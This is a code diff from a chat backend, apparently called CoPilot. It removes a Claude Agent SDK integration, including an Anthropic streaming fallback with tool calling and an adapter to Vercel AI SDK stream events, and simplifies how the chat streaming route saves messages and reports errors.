openai_msgs = session.to_openai_messages()
|
||||||
|
|
||||||
|
# The two consecutive assistants at index 1,2 should be merged
|
||||||
|
roles = [m["role"] for m in openai_msgs]
|
||||||
|
assert roles == ["user", "assistant", "tool", "assistant", "user"]
|
||||||
|
|
||||||
|
# The merged assistant should have both content and tool_calls
|
||||||
|
merged = cast(ChatCompletionAssistantMessageParam, openai_msgs[1])
|
||||||
|
assert merged.get("content") == "Let me build that"
|
||||||
|
tc_list = merged.get("tool_calls")
|
||||||
|
assert tc_list is not None and len(list(tc_list)) == 1
|
||||||
|
assert list(tc_list)[0]["id"] == "tc1"
|
||||||
|
|||||||
@@ -1,6 +1,5 @@
|
|||||||
"""Chat API routes for chat session management and streaming via SSE."""
|
"""Chat API routes for chat session management and streaming via SSE."""
|
||||||
|
|
||||||
import asyncio
|
|
||||||
import logging
|
import logging
|
||||||
import uuid as uuid_module
|
import uuid as uuid_module
|
||||||
from collections.abc import AsyncGenerator
|
from collections.abc import AsyncGenerator
|
||||||
@@ -17,16 +16,8 @@ from . import service as chat_service
|
|||||||
from . import stream_registry
|
from . import stream_registry
|
||||||
from .completion_handler import process_operation_failure, process_operation_success
|
from .completion_handler import process_operation_failure, process_operation_success
|
||||||
from .config import ChatConfig
|
from .config import ChatConfig
|
||||||
from .model import (
|
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
|
||||||
ChatMessage,
|
from .response_model import StreamFinish, StreamHeartbeat
|
||||||
ChatSession,
|
|
||||||
append_and_save_message,
|
|
||||||
create_chat_session,
|
|
||||||
get_chat_session,
|
|
||||||
get_user_sessions,
|
|
||||||
)
|
|
||||||
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
|
|
||||||
from .sdk import service as sdk_service
|
|
||||||
from .tools.models import (
|
from .tools.models import (
|
||||||
AgentDetailsResponse,
|
AgentDetailsResponse,
|
||||||
AgentOutputResponse,
|
AgentOutputResponse,
|
||||||
@@ -49,7 +40,6 @@ from .tools.models import (
|
|||||||
SetupRequirementsResponse,
|
SetupRequirementsResponse,
|
||||||
UnderstandingUpdatedResponse,
|
UnderstandingUpdatedResponse,
|
||||||
)
|
)
|
||||||
from .tracking import track_user_message
|
|
||||||
|
|
||||||
config = ChatConfig()
|
config = ChatConfig()
|
||||||
|
|
||||||
@@ -241,10 +231,6 @@ async def get_session(
|
|||||||
active_task, last_message_id = await stream_registry.get_active_task_for_session(
|
active_task, last_message_id = await stream_registry.get_active_task_for_session(
|
||||||
session_id, user_id
|
session_id, user_id
|
||||||
)
|
)
|
||||||
logger.info(
|
|
||||||
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
|
|
||||||
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
|
|
||||||
)
|
|
||||||
if active_task:
|
if active_task:
|
||||||
# Filter out the in-progress assistant message from the session response.
|
# Filter out the in-progress assistant message from the session response.
|
||||||
# The client will receive the complete assistant response through the SSE
|
# The client will receive the complete assistant response through the SSE
|
||||||
@@ -314,9 +300,10 @@ async def stream_chat_post(
|
|||||||
f"user={user_id}, message_len={len(request.message)}",
|
f"user={user_id}, message_len={len(request.message)}",
|
||||||
extra={"json_fields": log_meta},
|
extra={"json_fields": log_meta},
|
||||||
)
|
)
|
||||||
|
|
||||||
session = await _validate_and_get_session(session_id, user_id)
|
session = await _validate_and_get_session(session_id, user_id)
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
|
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
|
||||||
extra={
|
extra={
|
||||||
"json_fields": {
|
"json_fields": {
|
||||||
**log_meta,
|
**log_meta,
|
||||||
@@ -325,25 +312,6 @@ async def stream_chat_post(
|
|||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|
||||||
# Atomically append user message to session BEFORE creating task to avoid
|
|
||||||
# race condition where GET_SESSION sees task as "running" but message isn't
|
|
||||||
# saved yet. append_and_save_message re-fetches inside a lock to prevent
|
|
||||||
# message loss from concurrent requests.
|
|
||||||
if request.message:
|
|
||||||
message = ChatMessage(
|
|
||||||
role="user" if request.is_user_message else "assistant",
|
|
||||||
content=request.message,
|
|
||||||
)
|
|
||||||
if request.is_user_message:
|
|
||||||
track_user_message(
|
|
||||||
user_id=user_id,
|
|
||||||
session_id=session_id,
|
|
||||||
message_length=len(request.message),
|
|
||||||
)
|
|
||||||
logger.info(f"[STREAM] Saving user message to session {session_id}")
|
|
||||||
session = await append_and_save_message(session_id, message)
|
|
||||||
logger.info(f"[STREAM] User message saved for session {session_id}")
|
|
||||||
|
|
||||||
# Create a task in the stream registry for reconnection support
|
# Create a task in the stream registry for reconnection support
|
||||||
task_id = str(uuid_module.uuid4())
|
task_id = str(uuid_module.uuid4())
|
||||||
operation_id = str(uuid_module.uuid4())
|
operation_id = str(uuid_module.uuid4())
|
||||||
@@ -359,7 +327,7 @@ async def stream_chat_post(
|
|||||||
operation_id=operation_id,
|
operation_id=operation_id,
|
||||||
)
|
)
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
|
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
|
||||||
extra={
|
extra={
|
||||||
"json_fields": {
|
"json_fields": {
|
||||||
**log_meta,
|
**log_meta,
|
||||||
@@ -380,43 +348,15 @@ async def stream_chat_post(
|
|||||||
first_chunk_time, ttfc = None, None
|
first_chunk_time, ttfc = None, None
|
||||||
chunk_count = 0
|
chunk_count = 0
|
||||||
try:
|
try:
|
||||||
# Emit a start event with task_id for reconnection
|
async for chunk in chat_service.stream_chat_completion(
|
||||||
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
|
|
||||||
await stream_registry.publish_chunk(task_id, start_chunk)
|
|
||||||
logger.info(
|
|
||||||
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
|
|
||||||
extra={
|
|
||||||
"json_fields": {
|
|
||||||
**log_meta,
|
|
||||||
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
|
|
||||||
* 1000,
|
|
||||||
}
|
|
||||||
},
|
|
||||||
)
|
|
||||||
|
|
||||||
# Choose service based on configuration
|
|
||||||
use_sdk = config.use_claude_agent_sdk
|
|
||||||
stream_fn = (
|
|
||||||
sdk_service.stream_chat_completion_sdk
|
|
||||||
if use_sdk
|
|
||||||
else chat_service.stream_chat_completion
|
|
||||||
)
|
|
||||||
logger.info(
|
|
||||||
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
|
|
||||||
extra={"json_fields": log_meta},
|
|
||||||
)
|
|
||||||
# Pass message=None since we already added it to the session above
|
|
||||||
async for chunk in stream_fn(
|
|
||||||
session_id,
|
session_id,
|
||||||
None, # Message already in session
|
request.message,
|
||||||
is_user_message=request.is_user_message,
|
is_user_message=request.is_user_message,
|
||||||
user_id=user_id,
|
user_id=user_id,
|
||||||
session=session, # Pass session with message already added
|
session=session, # Pass pre-fetched session to avoid double-fetch
|
||||||
context=request.context,
|
context=request.context,
|
||||||
|
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
|
||||||
):
|
):
|
||||||
# Skip duplicate StreamStart — we already published one above
|
|
||||||
if isinstance(chunk, StreamStart):
|
|
||||||
continue
|
|
||||||
chunk_count += 1
|
chunk_count += 1
|
||||||
if first_chunk_time is None:
|
if first_chunk_time is None:
|
||||||
first_chunk_time = time_module.perf_counter()
|
first_chunk_time = time_module.perf_counter()
|
||||||
@@ -437,7 +377,7 @@ async def stream_chat_post(
|
|||||||
gen_end_time = time_module.perf_counter()
|
gen_end_time = time_module.perf_counter()
|
||||||
total_time = (gen_end_time - gen_start_time) * 1000
|
total_time = (gen_end_time - gen_start_time) * 1000
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
|
f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
|
||||||
f"task={task_id}, session={session_id}, "
|
f"task={task_id}, session={session_id}, "
|
||||||
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
|
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
|
||||||
extra={
|
extra={
|
||||||
@@ -464,17 +404,6 @@ async def stream_chat_post(
|
|||||||
}
|
}
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
# Publish a StreamError so the frontend can display an error message
|
|
||||||
try:
|
|
||||||
await stream_registry.publish_chunk(
|
|
||||||
task_id,
|
|
||||||
StreamError(
|
|
||||||
errorText="An error occurred. Please try again.",
|
|
||||||
code="stream_error",
|
|
||||||
),
|
|
||||||
)
|
|
||||||
except Exception:
|
|
||||||
pass # Best-effort; mark_task_completed will publish StreamFinish
|
|
||||||
await stream_registry.mark_task_completed(task_id, "failed")
|
await stream_registry.mark_task_completed(task_id, "failed")
|
||||||
|
|
||||||
# Start the AI generation in a background task
|
# Start the AI generation in a background task
|
||||||
@@ -577,14 +506,8 @@ async def stream_chat_post(
|
|||||||
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
|
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
# Surface error to frontend so it doesn't appear stuck
|
|
||||||
yield StreamError(
|
|
||||||
errorText="An error occurred. Please try again.",
|
|
||||||
code="stream_error",
|
|
||||||
).to_sse()
|
|
||||||
yield StreamFinish().to_sse()
|
|
||||||
finally:
|
finally:
|
||||||
# Unsubscribe when client disconnects or stream ends
|
# Unsubscribe when client disconnects or stream ends to prevent resource leak
|
||||||
if subscriber_queue is not None:
|
if subscriber_queue is not None:
|
||||||
try:
|
try:
|
||||||
await stream_registry.unsubscribe_from_task(
|
await stream_registry.unsubscribe_from_task(
|
||||||
@@ -828,6 +751,8 @@ async def stream_task(
|
|||||||
)
|
)
|
||||||
|
|
||||||
async def event_generator() -> AsyncGenerator[str, None]:
|
async def event_generator() -> AsyncGenerator[str, None]:
|
||||||
|
import asyncio
|
||||||
|
|
||||||
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
|
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
|
|||||||
@@ -1,14 +0,0 @@
|
|||||||
"""Claude Agent SDK integration for CoPilot.
|
|
||||||
|
|
||||||
This module provides the integration layer between the Claude Agent SDK
|
|
||||||
and the existing CoPilot tool system, enabling drop-in replacement of
|
|
||||||
the current LLM orchestration with the battle-tested Claude Agent SDK.
|
|
||||||
"""
|
|
||||||
|
|
||||||
from .service import stream_chat_completion_sdk
|
|
||||||
from .tool_adapter import create_copilot_mcp_server
|
|
||||||
|
|
||||||
__all__ = [
|
|
||||||
"stream_chat_completion_sdk",
|
|
||||||
"create_copilot_mcp_server",
|
|
||||||
]
|
|
||||||
@@ -1,354 +0,0 @@
|
|||||||
"""Anthropic SDK fallback implementation.
|
|
||||||
|
|
||||||
This module provides the fallback streaming implementation using the Anthropic SDK
|
|
||||||
directly when the Claude Agent SDK is not available.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
import os
|
|
||||||
import uuid
|
|
||||||
from collections.abc import AsyncGenerator
|
|
||||||
from typing import Any, cast
|
|
||||||
|
|
||||||
from ..config import ChatConfig
|
|
||||||
from ..model import ChatMessage, ChatSession
|
|
||||||
from ..response_model import (
|
|
||||||
StreamBaseResponse,
|
|
||||||
StreamError,
|
|
||||||
StreamFinish,
|
|
||||||
StreamTextDelta,
|
|
||||||
StreamTextEnd,
|
|
||||||
StreamTextStart,
|
|
||||||
StreamToolInputAvailable,
|
|
||||||
StreamToolInputStart,
|
|
||||||
StreamToolOutputAvailable,
|
|
||||||
StreamUsage,
|
|
||||||
)
|
|
||||||
from .tool_adapter import get_tool_definitions, get_tool_handlers
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
config = ChatConfig()
|
|
||||||
|
|
||||||
# Maximum tool-call iterations before stopping to prevent infinite loops
|
|
||||||
_MAX_TOOL_ITERATIONS = 10
|
|
||||||
|
|
||||||
|
|
||||||
async def stream_with_anthropic(
|
|
||||||
session: ChatSession,
|
|
||||||
system_prompt: str,
|
|
||||||
text_block_id: str,
|
|
||||||
) -> AsyncGenerator[StreamBaseResponse, None]:
|
|
||||||
"""Stream using Anthropic SDK directly with tool calling support.
|
|
||||||
|
|
||||||
This function accumulates messages into the session for persistence.
|
|
||||||
The caller should NOT yield an additional StreamFinish - this function handles it.
|
|
||||||
"""
|
|
||||||
import anthropic
|
|
||||||
|
|
||||||
# Only use ANTHROPIC_API_KEY - don't fall back to OpenRouter keys
|
|
||||||
api_key = os.getenv("ANTHROPIC_API_KEY")
|
|
||||||
if not api_key:
|
|
||||||
yield StreamError(
|
|
||||||
errorText="ANTHROPIC_API_KEY not configured for fallback",
|
|
||||||
code="config_error",
|
|
||||||
)
|
|
||||||
yield StreamFinish()
|
|
||||||
return
|
|
||||||
|
|
||||||
client = anthropic.AsyncAnthropic(api_key=api_key)
|
|
||||||
tool_definitions = get_tool_definitions()
|
|
||||||
tool_handlers = get_tool_handlers()
|
|
||||||
|
|
||||||
anthropic_tools = [
|
|
||||||
{
|
|
||||||
"name": t["name"],
|
|
||||||
"description": t["description"],
|
|
||||||
"input_schema": t["inputSchema"],
|
|
||||||
}
|
|
||||||
for t in tool_definitions
|
|
||||||
]
|
|
||||||
|
|
||||||
anthropic_messages = _convert_session_to_anthropic(session)
|
|
||||||
|
|
||||||
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
|
|
||||||
anthropic_messages.append(
|
|
||||||
{"role": "user", "content": "Continue with the task."}
|
|
||||||
)
|
|
||||||
|
|
||||||
has_started_text = False
|
|
||||||
accumulated_text = ""
|
|
||||||
accumulated_tool_calls: list[dict[str, Any]] = []
|
|
||||||
|
|
||||||
for _ in range(_MAX_TOOL_ITERATIONS):
|
|
||||||
try:
|
|
||||||
async with client.messages.stream(
|
|
||||||
model=(
|
|
||||||
config.model.split("/")[-1] if "/" in config.model else config.model
|
|
||||||
),
|
|
||||||
max_tokens=4096,
|
|
||||||
system=system_prompt,
|
|
||||||
messages=cast(Any, anthropic_messages),
|
|
||||||
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
|
|
||||||
) as stream:
|
|
||||||
async for event in stream:
|
|
||||||
if event.type == "content_block_start":
|
|
||||||
block = event.content_block
|
|
||||||
if hasattr(block, "type"):
|
|
||||||
if block.type == "text" and not has_started_text:
|
|
||||||
yield StreamTextStart(id=text_block_id)
|
|
||||||
has_started_text = True
|
|
||||||
elif block.type == "tool_use":
|
|
||||||
yield StreamToolInputStart(
|
|
||||||
toolCallId=block.id, toolName=block.name
|
|
||||||
)
|
|
||||||
|
|
||||||
elif event.type == "content_block_delta":
|
|
||||||
delta = event.delta
|
|
||||||
if hasattr(delta, "type") and delta.type == "text_delta":
|
|
||||||
accumulated_text += delta.text
|
|
||||||
yield StreamTextDelta(id=text_block_id, delta=delta.text)
|
|
||||||
|
|
||||||
final_message = await stream.get_final_message()
|
|
||||||
|
|
||||||
if final_message.stop_reason == "tool_use":
|
|
||||||
if has_started_text:
|
|
||||||
yield StreamTextEnd(id=text_block_id)
|
|
||||||
has_started_text = False
|
|
||||||
text_block_id = str(uuid.uuid4())
|
|
||||||
|
|
||||||
tool_results = []
|
|
||||||
assistant_content: list[dict[str, Any]] = []
|
|
||||||
|
|
||||||
for block in final_message.content:
|
|
||||||
if block.type == "text":
|
|
||||||
assistant_content.append(
|
|
||||||
{"type": "text", "text": block.text}
|
|
||||||
)
|
|
||||||
elif block.type == "tool_use":
|
|
||||||
assistant_content.append(
|
|
||||||
{
|
|
||||||
"type": "tool_use",
|
|
||||||
"id": block.id,
|
|
||||||
"name": block.name,
|
|
||||||
"input": block.input,
|
|
||||||
}
|
|
||||||
)
|
|
||||||
|
|
||||||
# Track tool call for session persistence
|
|
||||||
accumulated_tool_calls.append(
|
|
||||||
{
|
|
||||||
"id": block.id,
|
|
||||||
"type": "function",
|
|
||||||
"function": {
|
|
||||||
"name": block.name,
|
|
||||||
"arguments": json.dumps(
|
|
||||||
block.input
|
|
||||||
if isinstance(block.input, dict)
|
|
||||||
else {}
|
|
||||||
),
|
|
||||||
},
|
|
||||||
}
|
|
||||||
)
|
|
||||||
|
|
||||||
yield StreamToolInputAvailable(
|
|
||||||
toolCallId=block.id,
|
|
||||||
toolName=block.name,
|
|
||||||
input=(
|
|
||||||
block.input if isinstance(block.input, dict) else {}
|
|
||||||
),
|
|
||||||
)
|
|
||||||
|
|
||||||
output, is_error = await _execute_tool(
|
|
||||||
block.name, block.input, tool_handlers
|
|
||||||
)
|
|
||||||
|
|
||||||
yield StreamToolOutputAvailable(
|
|
||||||
toolCallId=block.id,
|
|
||||||
toolName=block.name,
|
|
||||||
output=output,
|
|
||||||
success=not is_error,
|
|
||||||
)
|
|
||||||
|
|
||||||
# Save tool result to session
|
|
||||||
session.messages.append(
|
|
||||||
ChatMessage(
|
|
||||||
role="tool",
|
|
||||||
content=output,
|
|
||||||
tool_call_id=block.id,
|
|
||||||
)
|
|
||||||
)
|
|
||||||
|
|
||||||
tool_results.append(
|
|
||||||
{
|
|
||||||
"type": "tool_result",
|
|
||||||
"tool_use_id": block.id,
|
|
||||||
"content": output,
|
|
||||||
"is_error": is_error,
|
|
||||||
}
|
|
||||||
)
|
|
||||||
|
|
||||||
# Save assistant message with tool calls to session
|
|
||||||
session.messages.append(
|
|
||||||
ChatMessage(
|
|
||||||
role="assistant",
|
|
||||||
content=accumulated_text or None,
|
|
||||||
tool_calls=(
|
|
||||||
accumulated_tool_calls
|
|
||||||
if accumulated_tool_calls
|
|
||||||
else None
|
|
||||||
),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
# Reset for next iteration
|
|
||||||
accumulated_text = ""
|
|
||||||
accumulated_tool_calls = []
|
|
||||||
|
|
||||||
anthropic_messages.append(
|
|
||||||
{"role": "assistant", "content": assistant_content}
|
|
||||||
)
|
|
||||||
anthropic_messages.append({"role": "user", "content": tool_results})
|
|
||||||
continue
|
|
||||||
|
|
||||||
else:
|
|
||||||
if has_started_text:
|
|
||||||
yield StreamTextEnd(id=text_block_id)
|
|
||||||
|
|
||||||
# Save final assistant response to session
|
|
||||||
if accumulated_text:
|
|
||||||
session.messages.append(
|
|
||||||
ChatMessage(role="assistant", content=accumulated_text)
|
|
||||||
)
|
|
||||||
|
|
||||||
yield StreamUsage(
|
|
||||||
promptTokens=final_message.usage.input_tokens,
|
|
||||||
completionTokens=final_message.usage.output_tokens,
|
|
||||||
totalTokens=final_message.usage.input_tokens
|
|
||||||
+ final_message.usage.output_tokens,
|
|
||||||
)
|
|
||||||
yield StreamFinish()
|
|
||||||
return
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
|
|
||||||
yield StreamError(
|
|
||||||
errorText="An error occurred. Please try again.",
|
|
||||||
code="anthropic_error",
|
|
||||||
)
|
|
||||||
yield StreamFinish()
|
|
||||||
return
|
|
||||||
|
|
||||||
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
|
|
||||||
yield StreamFinish()
|
|
||||||
|
|
||||||
|
|
||||||
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
|
|
||||||
"""Convert session messages to Anthropic format.
|
|
||||||
|
|
||||||
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
|
|
||||||
"""
|
|
||||||
messages: list[dict[str, Any]] = []
|
|
||||||
|
|
||||||
for msg in session.messages:
|
|
||||||
if msg.role == "user":
|
|
||||||
new_msg = {"role": "user", "content": msg.content or ""}
|
|
||||||
elif msg.role == "assistant":
|
|
||||||
content: list[dict[str, Any]] = []
|
|
||||||
if msg.content:
|
|
||||||
content.append({"type": "text", "text": msg.content})
|
|
||||||
if msg.tool_calls:
|
|
||||||
for tc in msg.tool_calls:
|
|
||||||
func = tc.get("function", {})
|
|
||||||
args = func.get("arguments", {})
|
|
||||||
if isinstance(args, str):
|
|
||||||
try:
|
|
||||||
args = json.loads(args)
|
|
||||||
except json.JSONDecodeError:
|
|
||||||
args = {}
|
|
||||||
content.append(
|
|
||||||
{
|
|
||||||
"type": "tool_use",
|
|
||||||
"id": tc.get("id", str(uuid.uuid4())),
|
|
||||||
"name": func.get("name", ""),
|
|
||||||
"input": args,
|
|
||||||
}
|
|
||||||
)
|
|
||||||
if content:
|
|
||||||
new_msg = {"role": "assistant", "content": content}
|
|
||||||
else:
|
|
||||||
continue # Skip empty assistant messages
|
|
||||||
elif msg.role == "tool":
|
|
||||||
new_msg = {
|
|
||||||
"role": "user",
|
|
||||||
"content": [
|
|
||||||
{
|
|
||||||
"type": "tool_result",
|
|
||||||
"tool_use_id": msg.tool_call_id or "",
|
|
||||||
"content": msg.content or "",
|
|
||||||
}
|
|
||||||
],
|
|
||||||
}
|
|
||||||
else:
|
|
||||||
continue
|
|
||||||
|
|
||||||
messages.append(new_msg)
|
|
||||||
|
|
||||||
# Merge consecutive same-role messages (Anthropic requires alternating roles)
|
|
||||||
return _merge_consecutive_roles(messages)
|
|
||||||
|
|
||||||
|
|
||||||
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
|
|
||||||
"""Merge consecutive messages with the same role.
|
|
||||||
|
|
||||||
Anthropic API requires alternating user/assistant roles.
|
|
||||||
"""
|
|
||||||
if not messages:
|
|
||||||
return []
|
|
||||||
|
|
||||||
merged: list[dict[str, Any]] = []
|
|
||||||
for msg in messages:
|
|
||||||
if merged and merged[-1]["role"] == msg["role"]:
|
|
||||||
# Merge with previous message
|
|
||||||
prev_content = merged[-1]["content"]
|
|
||||||
new_content = msg["content"]
|
|
||||||
|
|
||||||
# Normalize both to list-of-blocks form
|
|
||||||
if isinstance(prev_content, str):
|
|
||||||
prev_content = [{"type": "text", "text": prev_content}]
|
|
||||||
if isinstance(new_content, str):
|
|
||||||
new_content = [{"type": "text", "text": new_content}]
|
|
||||||
|
|
||||||
# Ensure both are lists
|
|
||||||
if not isinstance(prev_content, list):
|
|
||||||
prev_content = [prev_content]
|
|
||||||
if not isinstance(new_content, list):
|
|
||||||
new_content = [new_content]
|
|
||||||
|
|
||||||
merged[-1]["content"] = prev_content + new_content
|
|
||||||
else:
|
|
||||||
merged.append(msg)
|
|
||||||
|
|
||||||
return merged
|
|
||||||
|
|
||||||
|
|
||||||
async def _execute_tool(
|
|
||||||
tool_name: str, tool_input: Any, handlers: dict[str, Any]
|
|
||||||
) -> tuple[str, bool]:
|
|
||||||
"""Execute a tool and return (output, is_error)."""
|
|
||||||
handler = handlers.get(tool_name)
|
|
||||||
if not handler:
|
|
||||||
return f"Unknown tool: {tool_name}", True
|
|
||||||
|
|
||||||
try:
|
|
||||||
result = await handler(tool_input)
|
|
||||||
# Safely extract output - handle empty or missing content
|
|
||||||
content = result.get("content") or []
|
|
||||||
if content and isinstance(content, list) and len(content) > 0:
|
|
||||||
first_item = content[0]
|
|
||||||
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
|
|
||||||
else:
|
|
||||||
output = ""
|
|
||||||
is_error = result.get("isError", False)
|
|
||||||
return output, is_error
|
|
||||||
except Exception as e:
|
|
||||||
return f"Error: {str(e)}", True
|
|
||||||
@@ -1,198 +0,0 @@
|
|||||||
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
|
|
||||||
|
|
||||||
This module provides the adapter layer that converts streaming messages from
|
|
||||||
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
|
|
||||||
the frontend expects.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
import uuid
|
|
||||||
|
|
||||||
from claude_agent_sdk import (
|
|
||||||
AssistantMessage,
|
|
||||||
Message,
|
|
||||||
ResultMessage,
|
|
||||||
SystemMessage,
|
|
||||||
TextBlock,
|
|
||||||
ToolResultBlock,
|
|
||||||
ToolUseBlock,
|
|
||||||
UserMessage,
|
|
||||||
)
|
|
||||||
|
|
||||||
from backend.api.features.chat.response_model import (
|
|
||||||
StreamBaseResponse,
|
|
||||||
StreamError,
|
|
||||||
StreamFinish,
|
|
||||||
StreamFinishStep,
|
|
||||||
StreamStart,
|
|
||||||
StreamStartStep,
|
|
||||||
StreamTextDelta,
|
|
||||||
StreamTextEnd,
|
|
||||||
StreamTextStart,
|
|
||||||
StreamToolInputAvailable,
|
|
||||||
StreamToolInputStart,
|
|
||||||
StreamToolOutputAvailable,
|
|
||||||
)
|
|
||||||
from backend.api.features.chat.sdk.tool_adapter import (
|
|
||||||
MCP_TOOL_PREFIX,
|
|
||||||
pop_pending_tool_output,
|
|
||||||
)
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
|
|
||||||
class SDKResponseAdapter:
|
|
||||||
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
|
|
||||||
|
|
||||||
This class maintains state during a streaming session to properly track
|
|
||||||
text blocks, tool calls, and message lifecycle.
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, message_id: str | None = None):
|
|
||||||
self.message_id = message_id or str(uuid.uuid4())
|
|
||||||
self.text_block_id = str(uuid.uuid4())
|
|
||||||
self.has_started_text = False
|
|
||||||
self.has_ended_text = False
|
|
||||||
self.current_tool_calls: dict[str, dict[str, str]] = {}
|
|
||||||
self.task_id: str | None = None
|
|
||||||
self.step_open = False
|
|
||||||
|
|
||||||
def set_task_id(self, task_id: str) -> None:
|
|
||||||
"""Set the task ID for reconnection support."""
|
|
||||||
self.task_id = task_id
|
|
||||||
|
|
||||||
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
|
|
||||||
"""Convert a single SDK message to Vercel AI SDK format."""
|
|
||||||
responses: list[StreamBaseResponse] = []
|
|
||||||
|
|
||||||
if isinstance(sdk_message, SystemMessage):
|
|
||||||
if sdk_message.subtype == "init":
|
|
||||||
responses.append(
|
|
||||||
StreamStart(messageId=self.message_id, taskId=self.task_id)
|
|
||||||
)
|
|
||||||
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
|
|
||||||
responses.append(StreamStartStep())
|
|
||||||
self.step_open = True
|
|
||||||
|
|
||||||
elif isinstance(sdk_message, AssistantMessage):
|
|
||||||
# After tool results, the SDK sends a new AssistantMessage for the
|
|
||||||
# next LLM turn. Open a new step if the previous one was closed.
|
|
||||||
if not self.step_open:
|
|
||||||
responses.append(StreamStartStep())
|
|
||||||
self.step_open = True
|
|
||||||
|
|
||||||
for block in sdk_message.content:
|
|
||||||
if isinstance(block, TextBlock):
|
|
||||||
if block.text:
|
|
||||||
self._ensure_text_started(responses)
|
|
||||||
responses.append(
|
|
||||||
StreamTextDelta(id=self.text_block_id, delta=block.text)
|
|
||||||
)
|
|
||||||
|
|
||||||
elif isinstance(block, ToolUseBlock):
|
|
||||||
self._end_text_if_open(responses)
|
|
||||||
|
|
||||||
# Strip MCP prefix so frontend sees "find_block"
|
|
||||||
# instead of "mcp__copilot__find_block".
|
|
||||||
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
|
|
||||||
|
|
||||||
responses.append(
|
|
||||||
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
|
|
||||||
)
|
|
||||||
responses.append(
|
|
||||||
StreamToolInputAvailable(
|
|
||||||
toolCallId=block.id,
|
|
||||||
toolName=tool_name,
|
|
||||||
input=block.input,
|
|
||||||
)
|
|
||||||
)
|
|
||||||
self.current_tool_calls[block.id] = {"name": tool_name}
|
|
||||||
|
|
||||||
elif isinstance(sdk_message, UserMessage):
|
|
||||||
# UserMessage carries tool results back from tool execution.
|
|
||||||
content = sdk_message.content
|
|
||||||
blocks = content if isinstance(content, list) else []
|
|
||||||
for block in blocks:
|
|
||||||
if isinstance(block, ToolResultBlock) and block.tool_use_id:
|
|
||||||
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
|
|
||||||
tool_name = tool_info.get("name", "unknown")
|
|
||||||
|
|
||||||
# Prefer the stashed full output over the SDK's
|
|
||||||
# (potentially truncated) ToolResultBlock content.
|
|
||||||
# The SDK truncates large results, writing them to disk,
|
|
||||||
# which breaks frontend widget parsing.
|
|
||||||
output = pop_pending_tool_output(tool_name) or (
|
|
||||||
_extract_tool_output(block.content)
|
|
||||||
)
|
|
||||||
|
|
||||||
responses.append(
|
|
||||||
StreamToolOutputAvailable(
|
|
||||||
toolCallId=block.tool_use_id,
|
|
||||||
toolName=tool_name,
|
|
||||||
output=output,
|
|
||||||
success=not (block.is_error or False),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
|
|
||||||
# Close the current step after tool results — the next
|
|
||||||
# AssistantMessage will open a new step for the continuation.
|
|
||||||
if self.step_open:
|
|
||||||
responses.append(StreamFinishStep())
|
|
||||||
self.step_open = False
|
|
||||||
|
|
||||||
elif isinstance(sdk_message, ResultMessage):
|
|
||||||
self._end_text_if_open(responses)
|
|
||||||
# Close the step before finishing.
|
|
||||||
if self.step_open:
|
|
||||||
responses.append(StreamFinishStep())
|
|
||||||
self.step_open = False
|
|
||||||
|
|
||||||
if sdk_message.subtype == "success":
|
|
||||||
responses.append(StreamFinish())
|
|
||||||
elif sdk_message.subtype in ("error", "error_during_execution"):
|
|
||||||
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
|
|
||||||
responses.append(
|
|
||||||
StreamError(errorText=str(error_msg), code="sdk_error")
|
|
||||||
)
|
|
||||||
